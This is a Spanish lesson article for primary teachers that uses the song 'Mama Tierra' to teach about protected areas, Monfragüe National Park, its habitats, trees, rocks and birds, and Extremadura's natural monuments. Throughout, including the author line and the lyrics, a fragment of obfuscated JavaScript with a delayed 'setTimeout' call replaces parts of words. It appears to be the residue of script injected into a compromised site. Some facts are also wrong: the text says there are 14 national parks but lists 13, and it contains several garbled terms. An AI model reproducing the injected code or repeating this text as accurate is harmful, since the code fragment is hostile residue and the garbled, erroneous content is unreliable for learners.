CIENCIAS NATURALES ENFOCADO A EDUCACIÓN PRIMARIA.

Autora: Alicia González Mirandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anda


Finalidad: Proporcionar una educación que permita afianzar su desarrollo personal y su propio bienestar , adquiriendo  las habilidades culturales básicas relativas a la expresión y comprensión oral , a la lectora, a la escritura, y al cálculo así como desarrollar habilidades sociales , hábitos de trabajo y estudio , el sentido artístico y la creatividad.

En este artículo se refleja cómo puedo enseñar  el área de Conocimiento del medio  a partir de un hilo conductor lúdico y creativo como puede ser: una canción, un reportaje, una poesía, una fotografía, etc. Por lo que desarrollaré algunas prácticas en esta publicación:

PRÁCTICA 1: EL CUIDADO DEL PLANETA.

Comienzo la clase escuchandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la canción de “MAMA TIERRA” de Macaco  y viendo su videoclip:

Letra de la canción “MAMA TIERRA.”


Que difícil cantarle a tierra madre,
que nos aguanta y nos vio crecer,
y a los padres de tus padres
y a tus hijos los que vendrán después,
si la miras como a tu mama
quizás nos cambie la mirada,
y actuemos como el que defiende a los tuyos
y a los que vienen con el,
la raíz en mis pies yo sentí,
levante la mano y vi,
que todo va unido, que todo es un ciclo,
la tierra, el cielo y de nuevo aquí,
como el agua del mar a las nubes va,
llueve el agua y vuelta a empezar, oye i yee

Grite ,grite…o no lo ves??
va muriendo lentamente, mama tierra…mother earth…
(bis)

No se trata de romper ventanas,
ni farolas ni de cara,
mejor romper conciencias..equivocadas..oye..
nadie nos enseñó ni a ti ni a mi,
nadie nos explicó ni a ti ni a mí,
mejor aprender, que corra la voz y quizás conseguir..

(bbrbojer… bombeandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando tierra madre dice….
tr trr bombeandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando tierra madre te dice…basta!
trtrt bombeandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando trtrt bombeandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando
tierra madre escuche…
trtrt bombeandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando tierra madre dice…ponte en pie
trttr bombeandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando …mírame ihee)

Grite, grite…o no lo ve?? (No no no no lo ve…)
va muriendo lentamente, mama tierra…mother earth…
(bis x4)

Oh mama reclama,
se le apaga la llama,
y esto no es de hoy
de tiempos de atrás oihoy..
Decoré décadas degradandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando
Ya mama reclama,
se le apaga la llama,
se la venden hoy,
de lo que fue a lo que soy,
se trae magnifican sus latidos uhoy..
Llaman llaman..
mama tierra llaman..
ya que las manejan sin plan
demasiadas cavan
otras se caen luego frutos no dan
llaman llaman..
Mama tierra llaman…
oídos sordos les hace el “man”,
miradas se tapan,
contaminan hasta que eliminan

Grite, grite..o no lo ves???
va muriendo lentamente, mama tierra… mother earth
(bis x4)

 

En este video y canción nos dice cómo y por qué tenemos que cuidar nuestro planeta. Y a partir de esta canción estudiamos El medio Ambiente.

1-    AREAS NATURALES PROTEGIDAS.

 

¿QUÉ SON LAS ÁREAS PROTEGIDAS?

Las áreas protegidas contribuyen a la conservación del patrimonio natural y cultural de cada país y ayuda a reducir las presiones causadas por actividades humanas sobre estos ambientes. En ellos el impacto se reduce a la mínima expresión y por tanto se transforman en sitios de referencia para apreciar los beneficios de la protección.

Parque Nacional: Es un área protegida que goza de un determinado status legal que permite proteger y conservar la riqueza de su flora y fauna , se caracteriza por ser representativa de una región donde reside comunidades vegetales, animales interrelacionados entre sí y tener interés científico.

Zepas: zona de especial protección para las aves en un área protegida catalogada en estados miembros de la Unión Europea como zonas naturales de singular relevancia para la conservación de la fauna amenazada de extinción. En España algunas Zepas serian:  Las Villuercas ( geoparque), zepas de Sierra de Fuente llanos de Cáceres, Las Hurdes, Sierra de Gata, Sierra de San Pedro, La Campiña sur.

En España existen 14 Parques Nacionales, los cuales son:

-       Picos de Europa (antes era la Montaña de Covadonga)-Asturias, León y Cantabria.

-       Doñaana – Huelva y Sevilla

-       Sierra Nevada –Granada y Almería.

-       Archipiélago Cabrera-Islas Baleares

-       Islas Atlánticas de Galicia-Pontevedra y A Coruña.

-       Teide-Tenerife.

-       Cabañeros-Ciudad Real y Toledo.

-       Monfragüe –Cáceres.

-       Ordesa y Monte perdido-Huesca

-       Timanfaya – Lanzarote

-       Tablas de Daimiel –Ciudad Real.

-       Aigüestotes y Lago de San Mauricio-Lleida

-       Sierra de Guadarrama- Madrid –Segovia.

 Una normativa a nivel mundial es la Reserva de Biosfera Españolas. Dentro de la reserva de Biosfera, está la Unesco, que es la organización de Naciones Unidas para la Educación, Ciencia y Cultura.

UNESCO, tiene una red muy amplia de Reservas de Biosfera, una de ellas es el Parque Nacional de Monfragüe en Cáceres (Extremadura), que vamos a estudiar por estar en nuestra Comunidad.

MONFRAGÜE


     

 

 

 

 

 

 

 

 

Es uno de los 14 Parques Nacionales que existen en España. Se encuentra enclavado en la provincia de Cáceres y es el primer Parque Nacional de Extremadura. Los dos ríos que pasan por él son, el Tajo y el Tiétar.

FAUNA.

El parque cría más de 200 especies de vertebrados, otras muchas invernan o pueden darse de paso durante la migración a otras latitudes.

Las aves son el grupo de vertebrados con mayor abundancia de especies e individuos y fue declarado Zapa en 1991.

AVES:  Buitre Negro, Águila Imperial, Cigüeña Negra, Buitre Leonado, Búho Real , Águila Imperial Ibérica, Águila Perdicera, y Alimoche.

MAMÍFEROS: Lince, Nutria, Ciervo

VEGETACIÓN: Están las Dehesas con encinas, alcornoques, y quejigos, matorrales con parras, brezos, madroños, zonas rocosas con enebros y cornicabras.

En Monfragüe hay varios hábitats:

-DEHESAS Y MATORRALES: Son los lugares más representativos de Extremadura, ocupandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando aproximadamente el 35% de su territorio. Son el resultado del progresivo acaloramiento del bosque mediterráneo, donde se ha reducido el número de árboles y la presencia de matorrales y arbustos. Las dehesas se componen principalmente de encinas y alcornoques, mientras que en zonas de mayor altitud también existen dehesas de robles o incluso de quejigo.

Los matorrales son la formación vegetal formada por arbustos y matas. Son terrenos donde abundan las plantas y arbustos de poca altura.

-EL SOTO. Es un tipo de vegetación que sobrevive fundamentalmente por la humedad del suelo, y que crece en las orillas de un río, por lo general frondosamente.

-El BOSQUE MEDITERRÁNEO. Es un bioma (área dentro de una región geográfica con un determinado tipo de vegetación y fauna predominante) de bosques y matorrales que se desarrolla en regiones con clima mediterráneo, caracterizado por inviernos templados, veranos secos, otoños, y primaveras con abundantes precipitaciones. El suelo dominante es el rojo mediterráneo y el prado.

-ENCINA. Es un árbol de talla media que puede llegar a alcanzar de 16-25 metros de altura. Las hojas son perennes y permanecen en el árbol entre dos y cuatro años. La corteza es lisa y de color verde grisáceo en los tallos. Su futuro es la bellota.

-OLIVO. Es un árbol perennifolio (que conserva la hoja todo el año), longevo, que puede alcanzar 15 m de altura. Corteza finamente fisurada, de color gris.

-ALCORNOQUE.  Es un árbol de porte medio, de hoja perenne nativo de Europa y del norte de África. Muy extendido antromóficamente por la explotación de su corteza de la que se obtiene el corcho.

-PINO. Árbol de la familia Abietáceas, con las flores masculinas y  femeninas separadas en distintas ramas. Tiene por fruta la piña y por semilla de piñón. Las hojas son muy estrechas, puntiagudas y punzantes, persisten durante el invierno.

-ACEBUCHE. Olivo silvestre que se cría naturalmente sin cultivo en selvas o campos.

-ABETO. Constituye un género de árboles de la familia de las pináceas,

-CASTAÑO. Es un árbol de gran longevidad, la corteza es pardorojiza, y lisa en los ejemplares jóvenes, volviéndose en los viejos pardogrisácea y gruesa. Las hojas alternan y caducas, permanecen en el árbol un cierto tiempo después de secos.

-SAUCES. Se distribuyen por las zonas frías y templadas del hemisferio norte, principalmente en tierras húmedas, tiene la corteza acuosa, la madera es dura, flexible y normalmente suave. La mayoría son caducifolias (que se cae la hoja).

-MATORRAL. Un matorral está definido como una planta más ramificada que un árbol, con menos de 8 metros de altura y usualmente con muchos tallos.

PASTIZAL. Predomina la vegetación herbácea, puede ser de origen natural o ser producto de la intervención humana con fines de la crianza de ganado.

-AVELLANO. Es un árbol que alcanza normalmente entre 3 a 8 metros, alto de corteza marrón pálida y profundamente estirado, su madera es dura, flexible y muy resistente. Las hojas redondeadas, son suavemente pubescentes ( con vello) por ambas caras. Las flores nacen antes que las hojas, son monoicas (flores separadas en masculinas y femeninas) y con amentos de sexo diferenciados.

-QUEJIGO. Es un árbol semejante a la encina, aunque con follaje menos denso. Las hojas son de color verde por el haz y pálido por el revés. Las flores son muy sencillas y van reunidas en grupitos, el fruto es la bellota.

-CULTIVOS DE SECANO Y PASTIZALES. La agricultura de secano es aquella en la que el ser humano no contribuye con agua, sino que utiliza únicamente la que proviene de la lluvia. Algunos cultivos de secano son:

-Cereales: cebada, trigo, avena, centeno

-Legumbres: garbanzos, guisantes, habas

-Árboles frutales: almendro, albaricoque, olivo

-Vid

-Hortícolas: cebollas, melones, tomates.

La trilogía mediterránea se basa precisamente en el cultivo de trigo, olivos y vid.

-MONTAÑAS Y COQUEDOS. Es una zona de peñascos y rocas.

-ROCAS.

-Cuarcita: Es una roca metamórfica (que se forma pro transformación), dura con alto contenido de cuarzo. La cuarcita se forma por cristalización a altas temperaturas y presión. Tiene una meteorización lenta y produce suelos inusualmente delgados y magros.

-Pizarra: Es una roca metamórfica homogénea, formada por la compactación de arcilla. Es una roca densa, de grano fino, formada a partir de rocas sedimentarias arcillosas.

-Granito. Es una roca ígnea plutónica, constituida por cuarzo.

-AVES.

-Urraca. Es una especie de ave de la familia de los córvidos (familia de aves que se caracteriza por tener un plumaje negro y oscuro y pico largo y fuerte como la urraca o el cuervo), y es una de las aves más comunes de Europa. Es una de las aves más inteligentes  destaca por su cuerpo blanco y negro, acabado en una larga cola de color azul o verde. Se caracteriza por su larga cola escalonada y por sus alas cortas y redondeadas. Está presente en cualquier hábitat, exceptuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando bosques densos y pasajes situados a más de 1500m de altura. Es una especie que ha conseguido adaptarse, multiplicarse y aprovecharse de las alteraciones del medio que provoca el hombre.

-Petirrojo. Es un pájaro sociable, atrevido y curioso que acostumbra a salir del bosque y plantarse a mitad de un camino para ver quien llega en su territorio, emitiendo su característica voz de alerta. Su canto es un gorjeo musical muy melódico.

-Estornino. Es residente de la península Ibérica, tiene un color negro y se caracteriza por su corto cuello y cola. Es un ave ruidosa y puede imitar sonidos muy bien. Esta especie suele anidar en cavidades, que pueden ser un hueco en un árbol o agujeros en los edificios. Normalmente ponen 4 huevos.

- Gorrión. Está adaptado al hábitat urbano y habita todos los continentes, a excepción de la Antártida, al haber sido introducido por el ser humano en la mayor parte de ellos. Son pequeñas aves  de color marrón con cola corta y pico rechoncho, de gran alcance.

- Verdecillo. Es pariente cercano del Canario, mide 11-12 cm. se aposenta igualmente en un bosque que en un jardín, en un huerto, que en un árbol. Convive bien con animales de gran tamaño en comparación con el suyo.

-Triguero. Es un ave pequeña aunque de los mayores dentro de los escribanos. Su plumaje es pardo. Habita sobre todo en zonas abiertas, ya sean áreas de cultivo o de matorral bajo.

-Cogujada. Es un ave no migratoria que se distribuye por Europa y el norte de África. Tiene una cresta en la cerviz larga y puntiaguda. Se alimenta de semillas y durante la primavera y el verano de insectos que captura en la tierra. Emite un canto alegre y monótono. Habita en terrenos abiertos desérticos o poco cultivados y terrenos arenosos.

-Tarabilla. Son insectívoras, habitantes de matorrales y herbazales abiertos con arbustos pequeños dispersos.

-Pinzón. Vive en un gran ámbito de lugares, pero prefiere las zonas boscosas, aunque también se encuentran en jardines y granjas. Hace nidos en los árboles y decora el exterior con líquenes y musgos. No es un ave migratoria, pero busca los lugares cálidos en invierno. En general se alimentan de semillas, pero los jóvenes lo hacen de insectos.

- Tórtola turca. Casi siempre hace sus nidos en árboles, a veces en edificios. Se alimenta de trigo, avena, arroz.

- Abubilla. Es una especie migratoria. Habitan en regiones secas, encontrándose en bosques claros, zonas de frutales, viñedos y campos cultivados con arboleda.

-ZONAS URBANAS. Una zona urbana se caracteriza por estar habitada de forma permanente por más de 2000 habitantes. Es una posición geográfica altamente poblada.

-ZONAS HEMEDALES. Es una zona de tierras, generalmente planas, en la que la superficie se invade de manera permanente o intermitente. Al cubrirse regularmente de agua, el suelo se satura, quedandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando desprovisto  de oxígeno y dandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando lugar a un ecosistema híbrido entre los puramente acuáticos y los terrestres.

En Extremadura hay 4 monumentos naturales los cuales son:

1-    Los Barruecos: Es un pasaje natural declarado monumento natural por la Junta de Extremadura que establece la importancia de la geología , la fauna y la flora de la zona , así como la de los restos arqueológicos que atestiguan una continuada presencia humana en la región.

2-    Cueva de Castañar de Ibor. Se trata de una cavidad de espectacular belleza, formado por un universo de delicados formas de calcita, y presenta una ornamentación interior . la abundancia y variedad de formaciones de rocas que se produce en el interior de las cuevas que tapizan los techos, paredes y suelos de sus salas y galerías es verdaderamente única.

3-    Cueva de Fuente de León.  Situada al sur de Badajoz .En su interior se pueden apreciar bellos espelotemos: estalactitas, estalagmitas coladas, sifones (tubos en forma de U). La importancia de estas cuevas se debe a su origen cástigo , formado a través de los tiempos , como consecuencia de la alternación producida , producida por la acción del agua , en los carbonatos de las rocas calizas.

4-    Mina de Jayona. Es una antigua mina de hierro situada en la sierra del mismo nombre, en la provincia de Badajoz. Su recuperación ambiental ha generado un hábitat de enorme belleza con unas vistas impresionantes. Esta mina constituye un ejemplo de explotación minera abandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andonada. Sin parecerse a nada parecido, reúne las características propias de los roquedos verticales, las condiciones de luz, humedad, y vegetación de los desfiladeros fluviales y la flora y fauna de los ecosistemas mediterráneos propios de Extremadura.

 

CONCLUSIÓN.

Después de realizar este interesante recorrido , concluyo con la idea de que a partir de algo muy lúdico como puede ser una canción se pueden aprender muchísimas cosas relacionadas con las áreas de Educación Primaria , en este caso me he querido  acercar a la Comunidad de Extremadura conociéndola mejor y viendo sus preciosos rincones tanto en fauna , vegetación y parques naturales porque como dice Macaco en su canción “ Debemos cuidar nuestra tierra madre porque es nuestra casa y la será para las generaciones que vendrán” “ Ama a la tierra como te amas a ti mismo”.

BIBIOGRAFÍA.

-       LOE 2/2006 del 3 de Mayo

-       www.educarex.com

-CABRERA,A:1922. Los animales familiares.

-DATIN, J 1934. Las plantas cultivadas.

 

 

 

 

 

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